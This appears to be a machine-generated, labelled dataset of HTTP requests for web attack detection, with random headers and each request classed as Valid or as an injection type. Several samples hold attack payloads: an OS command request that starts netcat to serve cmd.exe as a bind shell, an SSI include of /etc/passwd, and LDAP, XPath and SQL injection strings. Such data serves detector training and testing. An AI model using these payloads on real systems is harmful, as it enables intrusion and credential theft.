ETag: "8XYa4ik.O@TvKv9X.8C1"
Expect: 5knu=nbscen;sdHA=Ety05
From: aepax@hknn.be
If-Modified-Since: Fri, 14 Aug 09 02:07:22 UTC
If-Unmodified-Since: Tue, 10 Oct 06 04:48:56 CET
If-Match: *
If-None-Match: "HAlo7rawVTP.uMvEe"
If-Range: Sun, 23 Aug 09 09:07:37 GMT
Max-Forwards: 7401
MIME-Version: 2.8
Pragma: teg='eyaa8'
Proxy-Authorization: Basic ZWljdW06aDdkSW8=
Authorization: eataui apuF=l9oXm
Range: 485874-76550,627253-,688763-0608
Referer: /nhbyp/iAayion/zd1ia/eernqoea.cfm
TE: chunked;q=0.5
Trailer: If-None-Match
User-Agent: Mozilla/1.6 (X11; U; SunOS sun4u 2.1; Dr-Si; rv:6.7.7) Gecko/34525457
UA-CPU: PowerPC
UA-Disp: 1270,703,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 733x086
Via: 5.3 www.Oaaot.gif
Transfer-Encoding: gzip
Upgrade: fR2SsR/5.3, 3lie4s/1.4, jotr/3.5, kw3/5.8, eyeh/6.5
Warning: 403 www.1ernaeea.tiff "sB1ntt" "Thu, 29 Jan 04 19:12:54 UTC"
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 2106773576
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26209
Start - Id: 36988
class: LdapInjection
GET /lDR2K3ztj-BRGa/owg-B/tcA/AtGhbrcgrh6xfeih5ri/4mewpadrtstodrDe4tHs/KXI5/9@/lVjjfhy7ab/nQ/kxecSuenzcS/xtHsncaynr3dWtet.asp?8nonwiso5eHtahs=hti9anrcinq3&efsrtsnHdUd=517&5jrsnemjuhats=oDwwaTZv&oabbe=gbhtlogeAbpassthruclery&arcrgrpa=748%29%28%26%28objectClass%3Drao%29%28%7C%28sn++%3D++++kubx%29%28cn%3D4oj+++J*%29%29&wxlnmo=G+f&4mto=pw.9IAp&tant=00413172&80MBC_Zp=1179538&tvewrnM3oTb=1949 HTTP/1.0
Host: 171.78.179.177
Connection: close
Accept: */*
Accept-Charset: iso-8859-6;q=0.9, iso-8859-5
Accept-Encoding: deflate;q=0.4
Accept-Language: hernlo-ra;q=0.2, ty-oloh6;q=0.9
Cache-Control: min-fresh=6557
Client-ip: 141.105.14.226
Cookie: eagjis=a6lhergsepecyi;ttgSxsmr=06839;eId=32792;ybredrayz=Teaelm0omv
Cookie2: $Version="55"
Date: Thu, 22 Feb 07 15:35:36 GMT
ETag: W/"NxJqMEpv_fMr0aSVD"
Expect: sgE2rcn=uwru3
From: 4t9lsozn@n1ns8ofqic.ch
If-Modified-Since: Tue, 05 Apr 05 12:42:11 GMT
If-Unmodified-Since: Mon, 08 Jan 07 01:33:24 GMT
If-Match: *
If-None-Match: "OrvU@KtcfM8_Ap4G"
If-Range: Sun, 29 Jan 06 11:54:07 UTC
Max-Forwards: 6
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic Z2ROZGI6ZGdpaQ==
Authorization: NTLM aTV1cmVmYlRlaEJ0ZXdzY2V0ZmRhYjN1cnJyYXN0ZHFuaGV3bmllZWVPcHRucWVp
Range: 84-,-422477,1197-5319
Referer: http://www.ccpe8.it/abd2/omyoM1ih/houaan.gif
TE: chunked
Trailer: Via
User-Agent: net1jot
UA-CPU: MIPS
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 391x727
Via: 3.2 www.onermn1l.png:2294
Transfer-Encoding: compress
Upgrade: Rtes2e/0.8, Uappi/6.8, oe526/7.2, eoop6g/8.7
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 0781389574649
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36988
Start - Id: 42801
class: OsCommanding
GET /gwIowttcy1.jpg?himef=5i&eroe=oGscPt%7Cl2j4&oV1mL.UXgj=50582&ejo=home%3AP&p2homelikewinnt@c=sco&prUTHr8ee=hm&tiro7=sne&2n91bo9=p%5Da%7C9%7CbRnull1hsfMbetweenc%3C HTTP/1.1
Host: 138.167.29.12:80
Connection: close
Accept: text/plain;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: |  shell("cmd     /c   c:InetpubwwwrootMSISSnc.exe -l  -p  3381     -t   -e     cmd.exe"    )    |     '
Accept-Language: *
Cache-Control: max-stale
Cookie2: $Version="869"
Date: Wed, 01 Aug 07 08:36:36 UTC
ETag: "MGdpJcopjUJjJCU_NB5"
If-Unmodified-Since: Sun, 11 Jun 06 04:46:46 GMT
If-Match: *
If-None-Match: "Ghzz_Aw5p0pEDjS13"
Max-Forwards: 799
Proxy-Authorization: Basic MHo0bnM6UmZTbg==
Authorization: NTLM bXNub25laWFoaDF0MXhTZDU3cm50bXNydzJudXE1cWRlZW5hZWVz
Referer: http://lOraeau.ch/le7rge/Xska.mpeg
TE: chunked;q=0.0,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.5 (X11; U; Linux i586 2.7; n8-Ao; rv:4.9.8) Gecko/82303327
UA-Pixels: 4444x6444
Via: hzes/7.8 108.211.80.164, 6.4 www.gkaonra.css
Transfer-Encoding: iSty

null

End - Id: 42801
Start - Id: 33403
class: Valid
POST /epIwynme3ep/rZS0t0rAwTLc@c/BscriptGcW.tiff? HTTP/1.1
Content-Length: 19
Content-Language: ihmytit,7
Content-Encoding: identity
Content-Location: /o0ndnh.png
Content-MD5: dG9nbmVjNHJyV2poc2g2eA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Dec 06 17:23:50 UTC
Last-Modified: Thu, 28 Dec 06 04:09:26 CET
Host: www.Nbsg.uk:80
Connection: elueeum
Accept: */*;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: lhoo49-3;q=0.8, rsztye-rY3;q=0.4
Cache-Control: max-stale=671
Client-ip: 87.155.255.84
Cookie: Xwget0vk1bgsoundtmpqp-@=iall aeenjtalsdmj;erem3ht3xephf=57;5vhmcnlXetti=Tsw&8;pabE1twlt6eyg=HT
Cookie2: $Version="0"
Date: Sat, 13 Mar 10 16:37:04 UTC
ETag: "AmF0BoiNVYeVcln"
Expect: ih1tshrh
From: ooydtlh@tuohEicue.de
If-Modified-Since: Tue, 19 Jul 05 15:02:48 CET
If-Unmodified-Since: Tue, 22 Sep 09 16:04:14 UTC
If-Match: "aGZDR3JbIDKKXaY0Vh"
If-None-Match: "mmZddek2TjF0ODAl-"
If-Range: Tue, 04 Mar 08 18:11:01 GMT
Max-Forwards: 2
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest response="12C5E9DBF4fDBC87c1c763B4689c6055"
Authorization: NTLM ZzJoZ29hdWpvaWU3bHRSYXRlZUR0dGFocm5zZURzZWl0ZW5jdG9u
Range: -45727
Referer: /XSgl1.php3
TE: trailers,chunked;q=0.7,chunked;q=0.0
Trailer: Range
User-Agent: Mozilla/2.1 (Machintosh; U; PPC Mac OS X 2.2; qY-om; rv:5.0.5) Gecko/55682002
UA-CPU: x86
UA-Disp: 326,087,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 1516x4646
Via: TOsait/6.1 33.52.252.155
Transfer-Encoding: ow5ly
Upgrade: ar8/7.2
Warning: 454 98.218.12.151:008 "6Oim04" "Sat, 06 Nov 04 21:21:33 UTC"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 538088947583493833
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

x0cfpswDa=126431357

End - Id: 33403
Start - Id: 25407
class: Valid
GET /oo/wlb/8oH/sqERUDo_qLWoUwVsSyI.tiff?yA=ntp7fniuamnsstpasswd&WkXlwbinfQN82=waot5a2hsDdtHn&rbealdg5q=aed%2F&Rvrtshsndleo=i%3B+&eennoji=ie%3Fdrop&crdtq5rovtrkiar=group+bytaa&oi=o&0he3NMinputqjP36=Rljbyd6aactqn&Otc=ywx&L9ulloh=38&mordy=scmd%27ko HTTP/1.1
Host: 119.101.75.104:80
Connection: im6u
Accept: */*;q=0.4
Accept-Charset: koi8-r;q=0.3, utf-7;q=0.3, iso-8859-8;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-age=8972
Client-ip: 141.90.56.165
Cookie: osa=549452;hpn=7Yd;8t9weos=noder;FzuusrVtLI8@Yc=pWDm.l.;cDsOreoo3sjhu=a5sVLA3-dwjC
Cookie2: $Version="78"
Date: Sat, 03 Dec 05 03:34:23 CET
ETag: "7@6wB8fqot3FBS2s4"
Expect: tzyu
From: an22ni@rv3edriauo.st
If-Modified-Since: Tue, 24 Mar 09 24:01:23 UTC
If-Unmodified-Since: Wed, 14 Apr 10 20:04:31 CET
If-Match: *
If-None-Match: "AGDhne7CqAqF8Bn9"
If-Range: "vLCsMOiEBk7@8ezl@ES"
Max-Forwards: 1170
MIME-Version: 2.0
Pragma: ZAaieh1d='Yiiuxi'
Proxy-Authorization: NTLM TnNpZW5pdGxvbXB0MlMxbWFzdGFhT2NoaG5hRmFlb25mZGUydDg=
Authorization: Digest uri=http://www.ubtqp0c.be/Nrre/nhmufr/iw1mnt/oxvoqt.pdf
Range: 06-841799,-16,747140-
Referer: http://www.tetrhTS.be/bi8Teoke/jermu.sh
TE: trailers
Trailer: Accept
User-Agent: ieeaaeop4mbeNs
UA-CPU: x86
UA-Disp: 071,871,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 407x092
Via: HTTP/7.4 244.155.211.43, 6.1 www.r4gMy.jpeg, HTTP/0.8 www.3e7ado.js:702
Transfer-Encoding: identity
Upgrade: rdnje/3.5, hyoyro/9.8, sao/2.7
Warning: 672 www.jiLqnc.html "r6wi" "Mon, 09 Aug 04 24:45:50 CET"
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 5936329330805787
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25407
Start - Id: 945
class: Valid
GET /xit75ddenw/sP.h4YfIXeKDSWpR/leY2Sonfa/pZ0jeBMwPIFDG72/s9nobirlds0iaigc3n/HZpvf7C.htm?trisdiahzr=eueie4sexec&8hQCtJMiuF=flIeecet7o&ezhnfjaia1lt=yhGo4y1NVys&roryoiatn=%25ro HTTP/1.0
Host: 188.193.27.128:80
Connection: keep-alive
Accept: image/gif, application/*, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 183.144.27.198
Cookie: 31=texeco5zhe0crh;obv0lEg=edi;jwe=tleisqeesT;He8latmgcrw=rhars
Cookie2: $Version="20"
Date: Tue, 22 Jul 08 16:32:30 GMT
ETag: "Uo7THHMLNiRRs0A3T"
Expect: 100-continue
From: shr8m@eagitmhb.de
If-Modified-Since: Sun, 05 Jul 09 14:54:00 CET
If-Unmodified-Since: Fri, 25 Aug 06 04:55:21 UTC
If-Match: ".g8rbnl-GRZIqia.i3"
If-None-Match: "D1GukBBrF4-eZAr"
If-Range: *
Max-Forwards: 054
MIME-Version: 3.0
Pragma: nlua=dlaut
Proxy-Authorization: eohT rfphcatq=baa6t
Authorization: NTLM YWFiZXR3ZXlodGljbWFucHQ5ZWVodGRhbm56Mm9nWXZpb2tjbm5ldGR0ZXQ=
Range: 37-165,99813-448132
Referer: http://cnsxseE.org/lenaWOLa/t9eya/Tar9/mvdh0.cgi
TE: trailers,gzip;q=0.8,gzip
Trailer: Connection
User-Agent: jkKl91jTz1 http://www.sdiesvIu.uk
UA-CPU: Sparc
UA-Disp: 678,1814,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3648x172
Via: 1.8 www.Efdv.html, FTP/9.6 224.244.192.226
Transfer-Encoding: i3ltsz
Upgrade: ero/9.1, efreh/0.0
Warning: 918 www.mhfdsijO.css "runearpylcyatEmy" 
X-Forwarded-For: 18.21.214.141
X-Serial-Number: 5433664
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 945
Start - Id: 26407
class: Valid
GET /ipKCsL/UUVibDeWRv/enoo/tEAHnANeBE1/s4yuwohes/nfVEo6qvcnkVDWz.cN/fBQ/e4Awqc..s3tWGTA/BYKZmLUGK8/s7U4r@kpAw3GLqCzlm/5f.msf?xrh=9561&SeCgudaOJste=02285097&h6ERoif209paTat=bpd+669%7CtiimgtpSn&wi5an4lNr2yh=N3y0a%3Fes&swhwnU=fBkW&gLCinEut=binprrmtno&iggn=rleEmEurnhy9r7ra&oeedt8h=cmdsr0rb9%7C8c&frmi=iRPSVycGB3%40o&oGirttel=sltnim%26&pN=886878 HTTP/1.0
Host: 229.156.179.134
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity
Accept-Language: 9ae2t7af-ahcaPC;q=0.9, toecna-ahii;q=0.8, d-eaoTs;q=0.9
Cache-Control: min-fresh=344
Client-ip: 89.50.78.92
Cookie: i2dbhtromeg=b<0;4za4=m?0d]p;jelNnncq=18830
Cookie2: $Version="60"
Date: Mon, 12 Nov 07 03:33:35 UTC
ETag: W/"atgKgpsyKFq7wLKv"
Expect: 100-continue
From: 0vaorneD@ken7hhpNbe.st
If-Modified-Since: Wed, 06 Sep 06 13:25:59 CET
If-Unmodified-Since: Tue, 17 Aug 04 13:13:22 GMT
If-Match: *
If-None-Match: *
If-Range: "9T9ULjvohvv.hIO"
Max-Forwards: 43
MIME-Version: 8.7
Pragma: hhgeayn=iehlc
Proxy-Authorization: NTLM dTRjYWl0dG1zZGVzbm5pbmRhYnNpZ2NlZWVnb2RNbmRudTU4c29uRXRnZQ==
Authorization: enug asnlDa=eeo7
Range: 828-31900
Referer: /sojo/truerl/lrdOdu.bin
TE: deflate,trailers,deflate;q=0.5
Trailer: If-Unmodified-Since
User-Agent: o6dAnp_iN http://www.dpahuEdr.be
UA-CPU: StrongARM
UA-Disp: 146,5965,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 782x1634
Via: 4.8 6.252.39.142
Transfer-Encoding: compress
Upgrade: eias4/8.2, 0it/9.6, nutr/1.8
Warning: 537 76.89.152.125 "oqet1tn44temca" "Mon, 16 Jan 06 20:27:08 UTC"
X-Forwarded-For: 59.157.184.124
X-Serial-Number: 7631325909856
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26407
Start - Id: 39566
class: SSI
PUT /@P8L/uTQbgY8Xi@iFuGWS3/eziaA/ppa5tou/MlDhtacces14/eJ5l15oE.bin? HTTP/1.1
Content-Length: 308
Content-Language: yhisnN6n
Content-Encoding: identity
Content-Location: /htmbo1t0.swf
Content-MD5: Y2R0aXJLc3R5NG51ZWE5ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Dec 08 13:41:11 CET
Last-Modified: Tue, 18 Mar 08 06:45:00 UTC
Host: 79.3.59.145
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: un5cel9-rk6h;q=0.6, elssitse-adet, jtDtrsn-gcu, 5n7-e;q=0.3
Cache-Control: max-age=9080
Client-ip: 222.71.177.248
Cookie: me2=%;sgUnbso8oher=enrnpaoa9varnoY;7idhaskuesdntra=6aHlho4sooc
Cookie2: $Version="24"
Date: Wed, 29 Jun 05 21:06:16 GMT
ETag: W/"vZcMQZwfRNN7OOS96"
Expect: 100-continue
From: aweeee@nAyt.uk
If-Modified-Since: Wed, 29 Apr 09 18:32:44 CET
If-Unmodified-Since: Mon, 28 Jul 08 11:13:49 GMT
If-Match: ".pWFlEZtIRHo2b2NVp"
If-None-Match: *
If-Range: Tue, 23 Dec 08 16:43:31 CET
Max-Forwards: 550
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: NTLM UjRpaXRwbWYxb2phZG9lbmE5R3dvYmVuOXVvaHY4aXJhenQ=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: 55851-,73887-,-7
Referer: /ldidEst/oCo7h/duQpt/TShyIiio.msf
TE: trailers,gzip;q=0.3,deflate;q=0.5
Trailer: Pragma
User-Agent: Mozilla/5.6 (Windows; U; Win 9x 2.1; th-zt; rv:9.4.6) Gecko/68215072
UA-Disp: 9131,8742,32
UA-OS: Windows NT
UA-Color: color8
Via: FTP/1.2 www.csrmn.htm:0353, 1.7 www.dius.png
Transfer-Encoding: compress
Upgrade: nqe/4.6, tcf/9.3, s1a3ie/5.1, pcoE/9.0, Ier1/7.4
Warning: 705 73.205.19.33:824 "uGhloLhinanOnahntN" 
X-Serial-Number: 7950474453739700165
----: -----------------
~~~~~: ~~~~~~~~~~

dVajarn=u&serviceslink&0TkPvKkallxml-JT=456578193&aihc=0odaci7 E&dlnsik=itcodrypyl&ven4usuge=bfeuz&h3itrs1Sgttt=divqh4 tsSe&uwx6Bpanc=ez?O&enue=046478&rarmErtmteYez=<!--   #include     virtual="/etc/passwd"  -->&glnoeRrke8u=927388&taueeuo=heedeltt&KO2Jz-=7&2nb=1662&f-jE5MANG-=nB9ISze8f

End - Id: 39566
Start - Id: 35482
class: XPathInjection
GET /Oxmllocationzz_@WtD/fhrnoiie/VY6NG-M3PhwXM/eZfMe4GGH7b/4rmilgs/tlggceb6slurrmcss/mMD53yRwk/fJokLI/4EiollrtaJm8saa7drt.swf?hu=961 HTTP/1.0
Host: 73.104.56.96
Connection: close
Accept: video/*;q=0.1, video/*, audio/*
Accept-Charset: windows-1255, euc-kr;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=7
Client-ip: 50.215.78.125
Cookie: kul=399;el=hcmaHj;pefint8b=lS;5TkdbrobeoeesP=sro+wtsa7atm8
Cookie2: $Version="414"
Date: Wed, 23 Jun 04 12:39:09 CET
ETag: "Gl6oIwNlvdG98J9"
Expect: otnsn=F0tl
From: laKsn@Rbbpaoe.de
If-Modified-Since: Fri, 18 Mar 05 12:51:14 GMT
If-Unmodified-Since: Sun, 26 Apr 09 05:47:13 UTC
If-Match: *
If-None-Match: *
If-Range: "HUC@Sx9Pv2q9dJyqQL--"
Max-Forwards: 9
MIME-Version: 0.4
Pragma: 949h9s='eF'
Proxy-Authorization: Digest qop=auth
Authorization: Digest algorithm=MD5-sess
Range: 586456-,8921-086904,04-
Referer: /uvbyAr.exe
TE: trailers,trailers
Trailer: Range
User-Agent: uls/ia/v/child::node()[   position()=5]     |   6/imme/ev/child::text()[position()=15]    or  'erh5'=    '
UA-CPU: PowerPC
UA-Disp: 7179,231,32
UA-Color: color16
UA-Pixels: 9064x1770
Via: 5.5 57.110.254.230:69, 1.0 66.156.58.1
Transfer-Encoding: compress
Upgrade: 0afh/7.8, vwin/6.7, BkRxh/3.8, trsf/0.4
Warning: 737 81.4.191.198 "bceai7" 
X-Forwarded-For: 156.158.202.82
----: -------------

null

End - Id: 35482
Start - Id: 23813
class: Valid
GET /o@4V/Y.c-A.tiff? HTTP/1.1
Host: www.NuNE.cz
Connection: 6feaudis
Accept: */*
Accept-Charset: isiri-3342;q=0.1, x-mac-arabic;q=0.1, x-mac-ce, macintosh;q=0.1
Accept-Encoding: gzip;q=0.1
Accept-Language: chPtem-tSOtIr;q=0.2, ewse-hfrnrtu;q=0.1, yjshe-u;q=0.5, a-vrohe;q=0.2, ft-rmsqitet
Cache-Control: no-cache
Client-ip: 90.182.234.155
Cookie: 8fo6=2014932;t4o9obovx=t~e;ost1nyC3nuomt=nea6lz96ues0tr
Cookie2: $Version="72"
Date: Sat, 24 Dec 05 11:56:25 CET
ETag: "nB_D5UyypLYa6kJ"
Expect: 100-continue
From: dhmtihz@kNxat8.be
If-Modified-Since: Wed, 19 Apr 06 12:12:59 UTC
If-Unmodified-Since: Wed, 11 Apr 07 14:17:38 UTC
If-Match: "KmZGqQj@jxYDHdc"
If-None-Match: *
If-Range: Mon, 04 Aug 08 19:11:02 CET
Max-Forwards: 2
MIME-Version: 8.7
Pragma: esyn='6nnoAt'
Proxy-Authorization: NTLM ckRTdG5mZXJvVXNvc2VvZ0cydGV4TG95MXJ4cmYyb2Zib25jaWNrZWV5YXJpMA==
Authorization: NTLM ZXJvc2dlSXIzdGVyYVJkdGhlT2RlNmVOZGRpZW1pc29hcEx1c2VjcDdzdw==
Range: 323-
Referer: /otahNsn/otsotny.dll
TE: gzip;q=0.8,deflate,trailers
Trailer: Connection
User-Agent: f5uTg (3z4qAQ; iTbd_oY; e5N@gu7B7v)
UA-CPU: PowerPC
UA-Disp: 363,234,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4203x994
Via: HTTP/1.8 71.178.44.82:2223, taa4o6/3.3 www.ryaa.shtml, FTP/3.3 9.181.96.171:76
Transfer-Encoding: gzip
Upgrade: rae/8.5, ne4/3.3, e4ck/8.2, 0teaus/2.2
Warning: 430 www.eLse.jpeg "spnnieaetrdru" "Tue, 30 Sep 08 02:07:35 UTC"
X-Forwarded-For: 151.135.237.72
X-Serial-Number: 370786959520494
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23813
Start - Id: 35207
class: SqlInjection
GET /55-nz1e/ensaTs2yah/iaXoGVDbx0Vt/ts7C4y6qh2kKI/yrbD/eS/hSamnY2695MEpN/e1JpOh-NS3bXOJndGCvZ.css?6e=n4herUe&ehj4unaneeeao9n=awhere&cOWyOlatmp=17&babhtsc3wimls=057&Yotue8=select++++EulbPib+++++from++ALL_USERS&3@i1=35420239&oehinhewe6=htre2hcmBh3Msr6&caobject7z=moEsf5tutmenm&RVvUacceptb=0%27q2TrUtnEiex&dbn=%3Cmra+eepo&heeGmrn6rndoe=%7C&qew=9&eda=a%2Fbm8oioGstn HTTP/1.1
Host: www.nTasgne.org
Connection: nhlgEs9
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: compress;q=0.0
Accept-Language: embur-po, eaaiBir-gnnuVuay;q=0.0, wDsval-1co;q=0.7
Cache-Control: oE9ci=ns2t
Client-ip: 217.245.127.231
Cookie: syebryfS2eyesl=5686346825;geeiu=gi;mitodppiasxi2f=it9pMzevn2hsiodfy1;nne=841811
Cookie2: $Version="8"
Date: Wed, 03 May 06 02:13:02 CET
ETag: W/"MR5Lgq2NZIWHqo0u"
Expect: 100-continue
From: 1sbtaan@lile.com
If-Modified-Since: Sat, 07 Nov 09 13:51:49 GMT
If-Unmodified-Since: Sun, 15 May 05 21:00:49 CET
If-Match: "mljvsz-0FOdenSPh"
If-None-Match: "kUWZ@JeHVBkKUlilNx"
If-Range: Fri, 04 Jan 08 08:25:06 CET
Max-Forwards: 67
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic RmVacGU6cmFzQQ==
Authorization: NTLM aHQzaGVudG50NXd1dG10ZXJoc2J6MWlyZWEya2VkeWVudFNqaXRyd2tiZXNz
Range: 786796-,-020
Referer: /nsiii.php3
TE: trailers,chunked
Trailer: If-Match
User-Agent: slsOnecmc04
UA-CPU: Sparc
UA-Disp: 601,1500,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: AoiaH/8.5 www.jmbewe.htm, radkp/7.2 www.naaMsp.css, 9.8 www.Kiihi.html
Transfer-Encoding: identity
Upgrade: iet/6.8, nt4/7.0, eolcon/0.5, onIars/2.7
Warning: 562 145.202.157.174 "Eninnaeeoatl9O4t" "Mon, 02 Feb 04 01:35:42 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35207
Start - Id: 26830
class: Valid
GET /te/varinsertQxcopyg/Y5Jf-CjaSm41SA4/pdKW7Z.QN5EN9dY/hYKS1xV9OTvS9hB/yaeA6repsbilcngat/hM6pS60xzlQ6q0kZZ/hznb/0cv@/em/tieddd/ilW7j.png?fnv=E8e%26ea%3D3%5Csibgsound+ltti&a4aa=430771298&80ull=102096&ehsdSes=GAsfyBo&931gaIxat=t%7C%28nsOgq-trE%7E HTTP/1.0
Host: 202.50.205.54
Connection: keep-alive
Accept: image/gif, text/*;q=0.9, video/quicktime;q=0.2
Accept-Charset: x-mac-korean;q=0.4, iso-8859-4, isiri-3342, x-mac-arabic
Accept-Encoding: 
Accept-Language: sesh-n8sqani, ssKgtd-u1duv;q=0.6, nnr7nv-MbncIt;q=0.8, b-leovw;q=0.4
Cache-Control: wlrtb='Eiwre'
Client-ip: 137.39.206.233
Cookie: dcQgV=hteAtu9aEfthoie;sm=holcoi'ec92se8
Cookie2: $Version="747"
Date: Mon, 09 Jul 07 15:54:47 GMT
ETag: "JFsDniNQmT0Lgvv"
Expect: 100-continue
From: 4ahee@onawd.st
If-Modified-Since: Thu, 11 Nov 04 23:08:13 GMT
If-Unmodified-Since: Thu, 27 Oct 05 06:05:04 UTC
If-Match: *
If-None-Match: "rXG4zhS7RFe5Zn-Ci"
If-Range: *
Max-Forwards: 77
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM ZnVuc05kbGRnSGVudmF0YjdzYmhsbmVhYXFlbTFudHRvbGpibWxrbHpwdG1FZWk=
Authorization: Digest algorithm=MD5-sess
Range: -6214
Referer: /6nEi7csw/d7t6e/glr8ilo/q1tat.cgi
TE: chunked;q=0.5,deflate
Trailer: Referer
User-Agent: Mozilla/1.6 (X11; U; Open BSD i586 1.0; sg-re; rv:0.3.4) Gecko/72616071
UA-CPU: StrongARM
UA-Disp: 5606,5500,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9604x4951
Via: ltae/7.6 www.Lca9s.tiff
Transfer-Encoding: iiOss; 3oi9nDt=8cstii5
Upgrade: advoos/2.4, 1dhv/7.1
Warning: 341 www.nnmq.png "nnserre1png8hew8e" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 333154589
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26830
Start - Id: 23275
class: Valid
GET /8a/wLIr7telnetU8binXVxconnectI2.shtml?UbwQk=636&sa7m=81&oeB9nOawPwe=peslciotaeNbOretoO&erpwr=C78and&lgt=e%7EIilocationatOhenEoeeipositionhla HTTP/1.1
Host: 27.64.49.221
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 17timj-SSeteqc, kee-yBrf9is;q=0.2, hr-ibrz7;q=0.0
Cache-Control: poseii=haogoi
Client-ip: 181.44.84.160
Cookie: oAo7r=74675;K7@libjS6xrmY=2883795;rShesnoiaam=Jehhv t~wz5;redroat8Ho=412155
Cookie2: $Version="943"
Date: Fri, 30 Oct 09 23:25:49 UTC
ETag: "2@ut8TgWDk520dACYX5"
Expect: 100-continue
From: seuezp8x@tfEa7ie.uk
If-Modified-Since: Thu, 20 Aug 09 02:59:36 UTC
If-Unmodified-Since: Thu, 02 Aug 07 02:40:55 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Mar 06 11:18:08 GMT
Max-Forwards: 562
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="5tlS"
Authorization: ozKu yOiIwN9J=dieiidro
Range: 46049-,984-,955-52588
Referer: /toit/hcf8sttl/elrtbret/T2eDn.exe
TE: chunked,chunked,chunked;q=0.7
Trailer: User-Agent
User-Agent: Mozilla/2.7 (compatible; MSIE 0.4; Solaris; octoxr)
UA-CPU: MIPS
UA-Disp: 5075,682,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1756x8385
Via: 5.6 www.Vhrdh.htm
Transfer-Encoding: ised; abxueaa=wpcahnm
Upgrade: etro5e/7.7, dH1i/3.8, rit/1.6
Warning: 836 www.snfril2o.jpg "cdqtacTsrnfqdneEeRe" "Sat, 16 Dec 06 14:24:55 UTC"
X-Forwarded-For: 55.67.110.255
X-Serial-Number: 736748310370
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23275
Start - Id: 11191
class: Valid
GET /s10umbO/iI2pmMGG8A49AdBk/odieiTneor/erauee/txfF3IBGP63Y/raaeaot/dPT5rV4e7DtmpICj.shtml?efnvbinsdi=3821&rform@_u0id6o=6070 HTTP/1.0
Host: 111.41.88.55
Connection: close
Accept: text/html
Accept-Charset: macintosh;q=0.0, iso-8859-2;q=0.8, iso-2022-kr, windows-1255;q=0.7, iso-8859-2;q=0.8
Accept-Encoding: 
Accept-Language: m6d-o, e-nze, doyit-r7, i-uc3nB
Cache-Control: p6s='nczheata'
Client-ip: 22.90.22.5
Cookie: uyloJGheoe=tOdneenttt;ZJuallG7=el2Ri 9'la?iohn
Cookie2: $Version="56"
Date: Mon, 02 Jun 08 13:33:46 GMT
ETag: "pa3UkJusathI0wj9l"
Expect: eczeesu=iUmhal;nbcu
From: oner40@a3mRaitss.com
If-Modified-Since: Thu, 25 Dec 08 21:00:37 UTC
If-Unmodified-Since: Wed, 12 Mar 08 24:18:09 CET
If-Match: *
If-None-Match: "AhOn-XxNDvD00GS"
If-Range: Tue, 20 Jan 04 17:19:26 CET
Max-Forwards: 046
MIME-Version: 3.9
Pragma: pgrgN=lhvy2o
Proxy-Authorization: Digest cnonce="irua"
Authorization: NTLM c3Jvbm9sZ3NkaWRhZGxldm5ydThhbmhpRGF5bWdza21tTGR5Y3JUZGRhMEZodA==
Range: 13-23
Referer: http://aOme.fr/orvqsae/cAAfspu/cLais2y6/ttb5En/Ettxeo.mp3
TE: chunked;q=0.2
Trailer: Warning
